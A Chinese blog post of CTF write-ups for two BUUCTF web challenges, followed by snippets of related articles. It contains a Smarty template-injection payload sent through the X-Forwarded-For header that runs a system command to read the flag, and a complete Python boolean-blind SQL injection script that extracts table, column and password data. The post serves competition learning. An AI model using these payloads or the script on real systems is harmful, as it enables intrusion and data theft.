buu做题(11)

已于 2024-07-31 00:06:52 修改
阅读量184 收藏 1
点赞数 2
文章标签: ctf web buuctf
于 2024-07-31 00:05:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80472909/article/details/140805912
版权

[CISCN2019 华东南赛区]Web11

抓个包可以发现是 Smarty框架
在这里插入图片描述
在页面可以观察到 一个 XFF头, 可以猜测注入点就在这
在这里插入图片描述通过 if 标签执行命令 ,读取flag
if system("cat /flag")}{/if}

在这里插入图片描述

[极客大挑战 2019]FinalSQL

一个登录框, 上面的提示应该就是要你盲注了
在这里插入图片描述

点一下那些数字会url上面有变化, /?id= , 应该就是注入点了
然后就是写脚本进行盲注了
学习一下别人的脚本:

import requests
import time

# url是随时更新的,具体的以做题时候的为准
url = 'http://1b56e0e9-cb22-45bf-98c0-87a739a6312c.node5.buuoj.cn:81/search.php?id='
i = 0
flag = ''
while True:
    i += 1
    # 从可打印字符开始
    begin = 32
    end = 126
    tmp = (begin + end) // 2
    while begin < end:
        print(begin, tmp, end)
        time.sleep(0.1)
        # 爆数据库
        # payload = "''or(ascii(substr(database(),%d,1))>%d)" % (i, tmp)
        # 爆表
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database())),%d,1))>%d)" % (i, tmp)
        # 爆字段
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME='F1naI1y')),%d,1))>%d)" % (i, tmp)
        # 爆flag 要跑很久
        # payload = "''or(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, tmp)
        # 爆flag 很快
        payload = "''or(ascii(substr((select(password)from(F1naI1y)where(username='flag')),%d,1))>%d)" % (i, tmp)
        # 错误示例
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(fl4gawsl))from(Flaaaaag)),%d,1))>%d)" % (i, tmp)

        r = requests.get(url+payload)
        if 'Click' in r.text:
            begin = tmp + 1
            tmp = (begin + end) // 2
        else:
            end = tmp
            tmp = (begin + end) // 2

    flag += chr(tmp)
    print(flag)
    if begin == 32:
        break

https://blog.csdn.net/Chu_Jian_Xiong/article/details/109071522

pwfortune
关注
2024年网络安全最新【算法学习】1929(1)
2401_84281698的博客
05-03 215
给你一个长度为 n 的整数数组 nums。具体而言,ans 由两个 nums 数组 串联 形成。返回数组 ans。
buu做题笔记——[安洵杯 2019]easy_web
weixin_46330722的博客
11-30 1446
BUU[安洵杯 2019]easy_web [安洵杯 2019]easy_web 进入题目就是这样一个页面,先看下源码 这里有一个提示,这题应该跟md5有关,这时我注意到了URL http://60c3d800-d438-4c23-87c2-dbee32a9e363.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= 这个img参数后面应该是个编码后的文件名,然后源码里就会出现base64编码的文件内容 将img参数的值解码
BUU第一页wp
2301_79525044的博客
03-09 632
注意strlen()函数,使用\x00截断,接着使用ret2libc的方法解决。func函数中存在栈溢出且存在system函数,可直接获取flag。vuln函数中,会将输入的I转化为三字节的you可以实现栈溢出。checksec发现为64位文件,开启了NX保护。存在system函数,/bin/sh字符串与栈溢出。发现后门函数,直接栈溢出到后门函数获取shell。观察主函数,发现system("/bin/sh")checksec发现为64位文件,开启了NX保护。栈溢出到后门函数,直接将flag打印出来了。
pwn练习题
WuMing_Z的博客
02-23 2406
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
BUUCTF Pwn jarvisoj_level01,网络安全系统工程师面试题
m0_60666841的博客
04-07 620
双击vulnerable_function发现buf变量分配的空间只有0x80,而read函数的第三个参数是0x200,会造成溢出。在python脚本中输入“node5.buuoj.cn”,25586是靶机信息。
[极客大挑战 2019]BabySQL
weixin_49267515的博客
07-22 419
查询表里的所有username和passoword,注意or被过滤。试一下双写,回到万能密码,用户名换为1’ oorr 1=1 #Ok,确定是过滤了,使用order by 确定下查询了几个列。看来union和select都被过滤了,使用双写。查看b4bsql表里有哪些column。用户名填:1’ or 1=1 #Ok,开始查看有哪些table。看起来or 和 by被过滤了。使用union select。试一下order by。
buu做题(8)
pwfortune的博客
07-27 1018
然后继续查看源码, 可以发现有一行base64的编码, 将其解密, 可以发现就是index.php的代码。, 很多都用不了了, 代码里可以看到 flag 在 config里面 , 不需要去构造一些命令执行啥的。参数过滤了很多命令, 绕过过滤, 最后能够依靠 反引号 `` 执行命令。然后尝试将index.php 按照这样的方式编码, 看看能不能包含到。能够访问到 需要的append()方法, 构造相应的值进行文件包含。的, 理论上应该用不了, 可能哪里没做好, 导致放出来了,查看根目录, 可以发现flag。
buu做题(5)
pwfortune的博客
07-19 1105
current(localeconv())永远都是个点 " . " 配合 scandir(current(localeconv())) 读取当前的目录。在使用 session_id()的时候 需要使用session_start()来开启session会话。不晓得为啥总是读取不了 , file:///etc/passwd 也读不了, 也不晓得是啥原因。那么可以用这个函数来获取cookie中的。可以看到需要的flag.php文件 , 要想办法读到这个文件。(这一块的内容也还不是很了解, 后面还得继续学习一下)
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 801
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
buu做题笔记——[网鼎杯 2020 朱雀组]phpweb&[SWPU2019]Web1
weixin_46330722的博客
11-06 1599
BUU[网鼎杯 2020 朱雀组]phpweb [网鼎杯 2020 朱雀组]phpweb 页面看不出啥,抓个包看看。 从包中我们可以看到,传递了两个参数,func和p。func的值是date,再结合p的值,我猜测这里是用了call_user_func()来回调函数,即将func的值当作函数名,p的值当作参数。那么我们直接使用system函数查看当前目录下的文件 回显Hacker,应该是被waf拦了,用highlight_file()看一下源码 <?php $disable_fun = arr
buu做题笔记——[BJDCTF2020]Mark loves cat&[MRCTF2020]Ez_bypass&[GKCTF2020]CheckIN
weixin_46330722的博客
11-05 699
BUU[BJDCTF2020]Mark loves cat[MRCTF2020]Ez_bypass [BJDCTF2020]Mark loves cat 进入题目是一个博客首页 点了半天没找到可以利用的点,用dirsearch扫一下 扫到.git目录,用Githack把源码down下来 看一下关键代码 //flag.php <?php $flag = file_get_contents('/flag'); //index.php <?php include 'flag.php';
buu 水题记录(二)
pwnyuan's blog
11-08 1553
buuctf 刷题记录(二)BeforeCrypto还原大师传感器CipherrotUnencode密码学的心声这是什么一张谍报RSARSA2RSA3rsa 2RSA5RSAROLLDangerous RSASameMod[AFCTF2018]Morse[NCTF2019]Keyboard[GXYCTF2019]CheckIn[HDCTF2019]basic_rsa[HDCTF2019]bbbbbbrsa Before Crypto 还原大师 TASC?O3RJMV?WDJKX?ZM E903???4D
Buuctf Web题解
weixin_68029979的博客
04-24 2015
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
BUUCTF刷题(前12道)
像初雪一样自由洒落
04-04 1207
哈哈哈,我又来刷题了,看了下BUUCTF上面的pwn题还真多。。。 test_your_nc ida查看,发现直接执行system,所以,直接交互就可以 //写下简单的脚本 from pwn import * p = remote('node3.buuoj.cn',28213) p.interactive() ...
盲水印隐写:FFmpeg提取视频关键帧中的频域隐藏标识.pdf
06-10
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 从隐写术到编码转换,从音频隐写到文件结构分析,CTF-Misc 教会你用技术的眼睛发现数据中的「彩蛋」。掌握 Stegsolve、CyberChef、Audacity 等工具,合法破解摩斯密码、二维码、LSB 隐写,在虚拟战场中提升网络安全意识与技术能力。记住:所有技术仅用于学习与竞赛!
基于SSM框架的JSP技术招聘网站开发
06-10
资源下载链接为: https://pan.quark.cn/s/9a27693985af 《基于SSM的JSP招聘网》是一款功能丰富的在线招聘平台,主要面向普通游客、求职者、企业和管理员四种用户角色,提供了多样化的服务与管理功能。该系统采用SSM(Spring、SpringMVC、MyBatis)技术栈开发,确保了系统的稳定性与高效性。以下是对系统功能模块及其技术实现的介绍。 对于普通游客,系统提供职位浏览功能。游客可以查看平台上的各种招聘信息,如职位描述、工作职责、薪资待遇等。这需要后台数据库对招聘信息进行有效存储和检索。在SSM框架中,SpringMVC负责处理HTTP请求,将数据传递给Spring服务层进行业务逻辑处理,MyBatis作为持久层工具,执行SQL查询并将结果映射为Java对象。 求职者注册成为平台用户后,可进行职位收藏和投递。收藏的职位信息会保存在个人中心,方便随时查看。职位投递功能涉及用户个人信息与简历的提交,需要系统具备用户认证和授权机制,可通过Spring Security或Apache Shiro实现。此外,系统可能采用AJAX技术进行异步操作,如即时刷新收藏夹状态,以提升用户体验。 企业用户可在系统中发布职位、查看求职者简历。发布职位时,需进行表单验证和数据合法性检查,SpringMVC的控制器可协同前端校验库(如Hibernate Validator)完成。查看简历时,企业可对求职者进行筛选和评价,这要求数据库设计合理,以便快速查询和分析求职者信息。 管理员负责管理平台运行,包括用户管理、职位审核、系统设置等。管理员模块通常包含后台管理界面,通过SpringMVC的模型视图解析器和模板引擎(如Thymeleaf或FreeMarker)生成动态页面。同时,日志记录和异常处理必不可少,Spring框架提供了强大的日志和AOP支持,可方便实现这些功
307-java基于云平台的信息安全攻防实训平台.zip
最新发布
06-10
java+vue+springboot源代码+配套文档+教程
【松下PLC例程】-沃得精机(110T)气压冲床程序,FP0 PLC.zip
06-10
【松下PLC例程】-沃得精机(110T)气压冲床程序,FP0 PLC.zip
167-游戏攻略分享微信小程序.zip
06-10
java+vue+springboot 源代码+配套文档+教程
buu upload-labs 11
09-19
引用、和是关于文件上传功能的源代码。这些源代码都是用于处理上传文件的功能,但每个源代码都有一些细微的差异。比如,引用和使用了文件的扩展名来确定文件类型,而引用则使用了文件的MIME类型来确定文件类型。 不论是哪个源代码,它们都首先检查上传文件的类型是否符合要求,然后将文件移动到指定的路径。如果移动文件成功,则标记$is_upload为true,否则将相应的错误信息存储在$msg变量中。 在回答完问题后,我会为您提供一些相关的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值